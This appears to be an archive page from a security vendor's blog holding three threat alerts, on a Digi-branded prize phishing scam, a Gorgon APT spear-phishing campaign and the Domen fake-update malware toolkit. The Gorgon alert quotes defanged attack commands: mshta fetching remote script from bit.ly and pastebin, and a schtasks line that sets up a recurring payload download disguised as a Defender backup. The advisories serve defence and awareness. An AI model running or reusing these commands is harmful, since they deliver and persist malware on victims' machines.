Category Archives: Latest threats

Scam Alert: Digi Phishing Campaign Detected, Asking Credentials for a Prize

Summary: we discovered a Digi phishing campaign targeted at Romanian internet users. However, the campaign is displaying tailored content for each country, so its actual target pool is much larger. The malicious domains could be accessed from organic Google search results and led the user to a page with Digi branding elements.

Once there, the users were invited to go through some steps, ‘win’ a prize consisting of a new smartphone and then claim the ‘prize’ by submitting their personal details, including credit card information.

How Does the Digi Phishing Campaign Work?

Incidentally, we found these malicious websites while looking for Antivirus-related search words on Google. It’s pretty ironic if I think about it since people who are looking for cybersecurity software could be well enough prepared to recognize a phishing campaign. Of course, I suspect that this is not the only search that could lead to these malicious but organic results to be displayed.

malicious organic search results

The malicious link for the Digi phishing campaign only worked if accessed from Google. If we attempted to access them directly, the browser just entered a redirect loop and nothing was loaded.

Once we accessed the website, the page first asked for verification of humanity (the standard ‘Confirm you are not a robot’ checkbox). Oddly, this first screen was displayed in Spanish, although the next ones are in Romanian, based on the correct identification of our location.

digi phishing campaign pic 1

After moving past the human confirmation screen, a page imitating the Digi brand is displayed. The page offers congratulations for being ‘one of the selected 100 users’ eligible to receive a smartphone gift. But before you can receive your gift, you need to answer 9 questions.

digi phishing campaign pic 2

The questions are well crafted as to not arouse suspicion. All of them were about the devices you use, what other internet and cable providers have you had, that kind of stuff – it can seem like legitimate competitor research questions a brand can ask its users.

After moving through the questions, you get another confirmation that you answered all of them, that no duplicate IP entries were found and that you are indeed about to get the smartphone reward.

digi phishing campaign page 3

Clicking ‘Next’ will take you to a page displaying the smartphone prize and asking for your email, as well as a confirmation you are over 18.

digi phishing campaign pic 4

After entering your email, you are asked for your credit card details, allowing you to ‘buy’ the smartphone for 4.99 RON, the approximate equivalent of 1 EURO. There’s also a countdown timer on the offer to make you feel the FOMO.

Judging by the bad grammar and spelling on this page, I have a strong hunch that this Digi phishing campaign displays in other languages as well, probably across Europe. 

digi phishing campaign pic 5

These are the malicious URLs we identified as part of this Digi phishing campaign (but they do not work if accessed directly, only if accessed through search results):{browser}&p=599&lpkey=15017060014a220f78&source=AdCash&campaign=173949420&zone=2048991-600419873-0&subzone=Adsterra&uclick=2tdv1ne2bl#

Meanwhile, our own cybersecurity software (the DNS traffic filtering engine in Thor Foresight Home) blocks all of the above.

Context: Another Campaign Which Fakes Digi Branding, but on Social Media

As it happens, another fraudulent campaign using the Digi branding has been identified in the past few days, on social media. There were 5 fake Facebook Digi accounts posing as the official page, even if they were clearly recently created and had very few likes. Link to full story HERE (the text is written in Romanian).

Even more weirdly, one of the pages also ran a sponsored campaign on Facebook, attempting to grow its user pool. The incident is unanimously believed to be a part of a potential electoral fraud campaign, preparing to flood people with fake news in order to influence their votes.

This Digi fake accounts campaign is not so different from the Cambridge Analytica scandal and also with some Russian involvement. Some of the ‘o’ characters in these fake Digi pages were not quite right, and a closer look revealed that the input method had been a Russian keyboard, using the Cyrillic equivalent of ‘o’.

Potential of Electoral Fraud?

Such campaigns have a huge potential for electoral fraud and other types of social engineering. While the two types of campaigns discovered could be unconnected, I’m not yet sure it’s all a coincidence.

It’s clear that the objective of the first campaign was to collect credit card details for some type of actual financial theft. It’s also true that Digi is a very well-known brand, so it makes sense for any hacking group to use its image for a campaign.

But at the same time, I am also concerned that the two Digi phishing campaigns are not unrelated and hacking into people’s wallets is just another offshoot of malicious intent. Especially since elections are upcoming and social engineering has already proved its potential for evil, I suspect we will see more in the following months.

How to Stay Safe from Phishing and Social Engineering in General:

We’ve written dedicated guides on how to stay safe from phishing and how to recognize social engineering. Please feel free to browse them and take some precautions from there.

In a nutshell, the most important take-away from the Digi phishing campaign is this: never fail to verify whether a domain you are accessing is the real deal. You can do this by checking its name in the address bar, by closing the tab and going to the official website, or even by contacting the customer service to be found on the official page. If an offer sounds too good to be true, it probably is.

As for social engineering and the potential of election fraud, things can be more complicated. There was huge backlash in both ways after the Cambridge Analytica scandal came to life. People are not comfortable accepting that they can be manipulated easily and that perhaps their ideas are not exactly their own. The only advice for this, beyond checking whether the pages posting stuff on social media are the official ones, is to strengthen your critical thinking as much as possible.

Note: I would like to thank my colleague Eduard Roth who initially drew my attention to this Digi phishing scam.

The post Scam Alert: Digi Phishing Campaign Detected, Asking Credentials for a Prize appeared first on Heimdal Security Blog.

SECURITY ALERT: Gorgon APT Targets Corporate Emails with Spear Phishing Campaign

The Gorgon APT (Advanced Persistent Threat) is an older but dangerous online threat, first discovered by Unit 42 researchers in February 2018.

The group behind the Gorgon APT was revealed back when the researchers were still investigating Subaat, an attacker, when they realized that they were probably part of a larger group targeting governmental organizations.

The History of Attacks by Gorgon APT

Ever since its initial discovery in February 2018, the Gorgon APT was orchestrating attacks both on government organizations (in the United States, United Kingdom, Russia, Spain, and others) and on corporate targets around the world.

The Gorgon group has often shared infrastructure when performing criminal and nation-state targeted attacks. This made the APT easier to track across these operations.

Within the Gorgon APT infrastructure, the researchers were able to identify several crimeware family samples, including Trojans, RATs like NjRat and info stealers such as LokiBot. These were all hosted on the command and control (C2) domain of the Gorgon group.

Interestingly, the Gorgon APT didn’t just use the traditional C2 strategies we could expect from it. It also used a variety of URL shortening services in order to download its payloads. This made its criminal activity more wide-spread and potentially more complex to track down, identify and eradicate.

The Current Spear Phishing Campaign by Gorgon APT

While the activities of the Gorgon APT flared on and off from February 2018 until now, the group is now back strongly with a new spear-phishing campaign.

So far, the targets we have intelligence about are located in Europe, but everyone else should be on guard too. It begins with an email containing this text (sanitized for your safety):


Re: Invoice_74521451


Dear Sir

My colleague handling this order is out of office for his vacation.

Please confirm the attached invoice as enabling us to proceed with the payment schedule.


Sri Astuti



As you can see, the bait here is the attached Excel document. Once the target clicks it, the malicious file will deliver the payload. The XLS file contains macro / VBA code which gets enabled once the document is opened.

Just like in its previous attacks, the Gorgon APT then connects to Pastebin and downloads and runs an obfuscated Javascript / VBA code from there.

This is done by spawning a shell with the following command:

mshta http://bit[.]ly/mydahsgkjshwodakiterikus


C:\Windows\System32\mshta.exe” http://www.pastebin[.]com/raw/0php6n7G

This leads to several layers of unescape obfuscation that redirects the traffic to a number of other Pastebin addresses (sanitized for your safety):




It creates a scheduled task that ensures that the payload is continuously downloaded (sanitized for your safety):

C:\Windows\System32\schtasks.exe” /create /sc MINUTE /mo 300 /tn “DEFENDER Backup” /tr “mshta http:\\pastebin[.]com\raw\3qUvqbpZ”

A total of three script obfuscation methods are used: “StrReverse”, “split variables” and “multiple Wscript objects”.

The payload uses the function “LoadWithPartialName” via “reflection assembly” in the NET framework in order to download and process raw data in memory.

The final payload is a data stealer that communicates with multiple domains, all of which have already been blocked in Heimdal’s Thor Foresight engine.

The malicious XLS document is detected by 8 out of 57 Antivirus products listed by VirusTotal. This means that you can’t rely solely on your Antivirus to stay safe.

How to Stay Safe from the Gorgon APT and other Spear Phishing Campaigns:

#1. Don’t trust emails from people you don’t know

As much as possible, do not open attachments or click links from emails coming from unknown contacts. I know that in a professional environment this is virtually impossible but try to do your best.

You can read the emails, but don’t click links or open attachments until you establish more contact background. Reach out and ask the sender to remind you where you were acquainted or what deal they are bringing up.

Ideally, find a way to verify the sender legitimacy independent of further email threads. Pick up the phone and give them a call. Ask who introduced you if they are legit and how well do they know them.

#2. Don’t enter your credentials anywhere without extra checks

If you find yourself on a website or portal that looks like one you trust (Google, Facebook, Outlook, Salesforce, etc.) but which asks you to re-enter your credentials, don’t do it. No matter how much it looks like the real deal, it could be a spear-phishing attempt.

Make sure you check and double-check that the website address is correct, with no alterations. If you have any doubts, don’t enter your credentials. If it’s indeed necessary, you will be prompted to do it in the mail portal / app that you use, anyway.

#3. Have an email security solution firmly in place

Run your incoming emails through a solution which prevents BEC attacks, to make sure online crooks are not trying to fool you. Business Email Compromise (BEC) attacks are a growing threat and your email spam filter or firewall are not enough to halt it.

Final word

Last, but not least, stay vigilant. Learn how social engineering works, and how cybercriminals can get into your accounts. Keep learning more about cybersecurity so nothing can catch you by surprise.

If you’re interested, sign up for our Cybersecurity Course for Beginners. It’s completely free and you can learn everything at your own pace. Stay safe!

The post SECURITY ALERT: Gorgon APT Targets Corporate Emails with Spear Phishing Campaign appeared first on Heimdal Security Blog.

SECURITY ALERT: New Domen Toolkit Pushes Malware through Fake Software Updates

A new toolkit has emerged in the past few days, infecting users via compromised websites.

Most of the compromised websites which are unknowingly hosting the toolkit are based on a WordPress script, which leaves them vulnerable to be exploited this way.

The toolkit has been dubbed Domen and abuses the trust of users in a classic social engineering move. Relying on the fact that most users are aware of the necessity of updates, the toolkit creators are piggyback riding on the trustworthiness of the programs they claim to represent.

When one sees a notification for a required update from a software brand they already have and trust, chances are they will approve without thinking twice. That’s how the Domen toolkit spreads and infects hosts, allowing hackers to access the infected devices remotely, to take screenshots, steal data and more.

The Domen toolkit was first discovered by security researcher Jérôme Segura, and further reported on by security researcher mol69.

How Does the Domen Toolkit Work?

The Domen Toolkit targets both PC and mobile users. So far, security researchers have discovered Domen messages being delivered in as many as 30 different languages. Besides the linguistic variety, the Domen toolkit is also remarkable in its high level of customization and sophistication.

Because of its complexity, the toolkit is able to adapt to various browsers, operating systems, clients and so on. This is what makes Domen more dangerous than the usual run-of-the-mill exploit kits abusing Flash vulnerabilities.

After an internet user visits a website infected with the Domen toolkit, they will start seeing pop-ups prompting them to install a ‘required’ software update. Those software update messages are delivered with regards to multiple software names and in 30 languages so far.

For example, here is a screenshot of a fake Chrome update prompt.

screenshot of fake chrome update notification

Screenshot courtesy of Bleeping Computer.

Once you click the button accepting the software update, a file named download.hta will be downloaded into your device.

Upon being executed, that file will then download a client-side remote access tool (template.js) into %Temp%\jscheck.exe. Unlike other toolkits, Domen allows this tool to be highly customized. The hacker using it can choose whatever malware payload they wish to deliver into the device after they infected. Therefore, not all users were then infected with the same malware strains after falling for the Domen fake update prompt.

The remote access tool installed by the initial file (download.hta) will automatically get installed and run after infection. If infected with it, you can notice it in your list of ongoing processes, under the name NetSupport Manager, as in the screenshot below.

screenshot of remote access malware in list of processes

Screenshot courtesy of Bleeping Computer.

However, if you got infected on a mobile device, doing this quick check might not be as easy.

Another piece of good news is that if your device is well protected by a strong next-gen Antivirus and a DNS traffic filter, the NetSupport Manager shouldn’t pass undetected. Your cybersecurity suite will definitely alert you that something is wrong.

Unfortunately, the Domen toolkit installs other things besides NetSupport Manager. It is up to the hacker running the campaign to choose what malware payload they wish delivered and installed, so what you get is a bit of a wildcard.

How to detect the Domen Toolkit and How to Stay Safe

As mentioned above, a surefire way to determine if your computer has been infected by the Domen Toolkit is to quickly run a process check. If the NetSupport Manager tool appears in the list of ongoing processes, you’re infected.

Depending on the stage of the infection, you might notice other signs that something is wrong. The signs that your computer is infected with malware are numerous and can differ depending on the exact malware you are infected with.

By and large, though, any sudden change, evidence of someone using your computer remotely, any apps or software you don’t remember installing, your browser homepage changing – all these are signs of a malware infection.

A good cybersecurity suite should help you get rid of the infections quickly, but by then the damage might already be done. If hackers used the infection to compromise your data or steal accounts, it could prove difficult to put a lid on it. As always, prevention is the best cure.

To make sure you don’t fall for the Domen toolkit or similar fake notifications, why not install an automatic software updater, like our Thor Free?

Get Thor Free

The Thor Free tool is free to use forever and it will close all outdated software vulnerabilities. Whenever an update is available for one of your installed software or apps, Thor Free will automatically apply the patch. It works silently, in the background, without requiring permissions and restarts every time.

This way, even if you get targeted by messages such as the ones used by the Domen toolkit, you will have no reason to think they are legit. You will already have a professional tool handling all your required updates.

Good luck and stay safe.

P.S: If you already have an active Thor Foresight Home or Thor Premium Home license, you are benefitting from the Thor Free functionalities so there’s no need to install the automatic software updater. 

The post SECURITY ALERT: New Domen Toolkit Pushes Malware through Fake Software Updates appeared first on Heimdal Security Blog.